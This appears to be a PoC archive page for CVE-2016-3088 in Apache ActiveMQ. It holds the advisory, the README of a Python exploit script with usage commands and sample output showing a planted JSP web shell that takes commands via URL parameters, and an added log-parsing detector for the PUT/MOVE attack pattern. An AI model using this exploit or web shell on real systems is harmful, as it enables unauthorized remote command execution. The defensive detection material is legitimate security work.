CVE-2016-3088 PoC — Apache ActiveMQ Input Validation Error Vulnerability

Source
Associated Vulnerability
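Title: Apache ActiveMQ Input Validation Error Vulnerability (CVE-2016-3088)
Description: Apache ActiveMQ is an open-source message middleware from the Apache Software Foundation. It supports the Java Message Service, clustering, the Spring Framework, and more. A security vulnerability exists in the Fileserver web application in Apache ActiveMQ 5.x versions before 5.14.0. A remote attacker can exploit it by sending HTTP PUT and HTTP MOVE requests to upload and execute arbitrary files.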
Description
A Python-based Exploit Script for CVE-2016-3088
Readme
# CVE-2016-3088
## Statement
A Python-based Exploit Script for CVE-2016-3088.\
This is my first script, so there may be something that doesn't quite fit.\
But it seems to work correctly when I tested it.
## Description
This script eliminates the need to capture packets during the penetration of CVE-2016-3088,\
so we can write & move the file directly.
## Usage
```
python CVE-2016-3088.py --url http://ip:port/ [--path absolute_path] [--script filename.txt]
```

The --script parameter is optional. If you run the program without it, the built-in payload is used,\
which only lets you execute a few commands via the URL.\
But you can supply other scripts to achieve your purpose.
## Installation
Just download the .py file.\
It also requires some modules.
## Example
```
$ python CVE-2016-3088.py --url http://192.168.244.153:8161/ --path /opt/activemq

[+] The target is Vulnerable  
[+] Exploiting...  
[+] Successful!  
[+] Visit The JSP file: http://192.168.244.153:8161/admin/d404ca6ffa5849a9ab1202dd388684f5.jsp?pwd=023&i=[Your-Command]  
```

##### Use the --script  
```
$ python CVE-2016-3088.py --url http://192.168.244.153:8161/ --path /opt/activemq --script script.txt

[+] The target is Vulnerable  
[+] Exploiting...  
[+] Successful!  
[+] Visit The JSP file: http://192.168.244.153:8161/admin/6655d82d47cd43bb8a21515f476bce1f.jsp  
```
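For defenders, the PUT and MOVE requests named in the vulnerability description, followed by a request for a previously unseen JSP like the one in the output above, leave a recognizable sequence in the broker's web access log. The following is an added detection example, not part of the original README or script; it assumes NCSA common log format and that the Fileserver application is served under `/fileserver/`, and the function name and sample lines are constructed for illustration.

```python
import re
from collections import defaultdict

# NCSA common log format is assumed (not stated on the page).
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})\b'
)

def find_fileserver_abuse(lines):
    """Return (line_no, client, rule, path) for each suspicious request."""
    findings = []
    stage = defaultdict(int)  # per client: 1 = PUT accepted, 2 = PUT then MOVE accepted
    baseline_jsp = set()      # JSPs requested by clients that never did PUT+MOVE
    for no, line in enumerate(lines, 1):
        m = LINE_RE.match(line)
        if not m:
            continue
        ip, method = m["ip"], m["method"]
        path = m["path"].split("?", 1)[0]
        ok = m["status"].startswith("2")
        if path.startswith("/fileserver/") and method in ("PUT", "MOVE"):
            # PUT and MOVE against the Fileserver app are the requests the advisory names.
            rule = "fileserver-" + method.lower() + ("" if ok else "-rejected")
            findings.append((no, ip, rule, path))
            if ok and method == "PUT":
                stage[ip] = max(stage[ip], 1)
            elif ok and stage[ip] >= 1:
                stage[ip] = 2
        elif path.lower().endswith(".jsp"):
            if stage[ip] < 2:
                baseline_jsp.add(path)
            elif ok and path not in baseline_jsp:
                # A JSP nobody requested before, fetched after an accepted PUT+MOVE.
                findings.append((no, ip, "new-jsp-after-move", path))
    return findings

# Constructed sample lines (documentation IP ranges, made-up file names).
SAMPLE_LOG = [
    '198.51.100.20 - admin [10/Jun/2016:09:00:01 +0000] "GET /admin/queues.jsp HTTP/1.1" 200 5120',
    '203.0.113.7 - - [10/Jun/2016:09:14:02 +0000] "PUT /fileserver/a.txt HTTP/1.1" 204 0',
    '203.0.113.7 - - [10/Jun/2016:09:14:03 +0000] "MOVE /fileserver/a.txt HTTP/1.1" 204 0',
    '203.0.113.7 - - [10/Jun/2016:09:14:05 +0000] "GET /admin/0123456789abcdef0123456789abcdef.jsp HTTP/1.1" 200 12',
    '198.51.100.20 - admin [10/Jun/2016:09:20:00 +0000] "GET /admin/queues.jsp HTTP/1.1" 200 5120',
    '192.0.2.44 - - [10/Jun/2016:09:30:00 +0000] "PUT /fileserver/b.txt HTTP/1.1" 404 0',
]

if __name__ == "__main__":
    for finding in find_fileserver_abuse(SAMPLE_LOG):
        print(finding)
```

Common log format does not record the MOVE `Destination` header, so the rule correlates by client address rather than by target path. On a patched or hardened broker the `-rejected` findings still show who is probing.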

## Disclaimer
Please use this tool with care and only when authorized!
File Snapshot

```
[4.0K] /data/pocs/18f8ff70920cb3be89d341bc378c354e0cb3c77a
├── [4.0K] CVE-2016-3088.py
└── [1.4K] README.md

0 directories, 2 files
```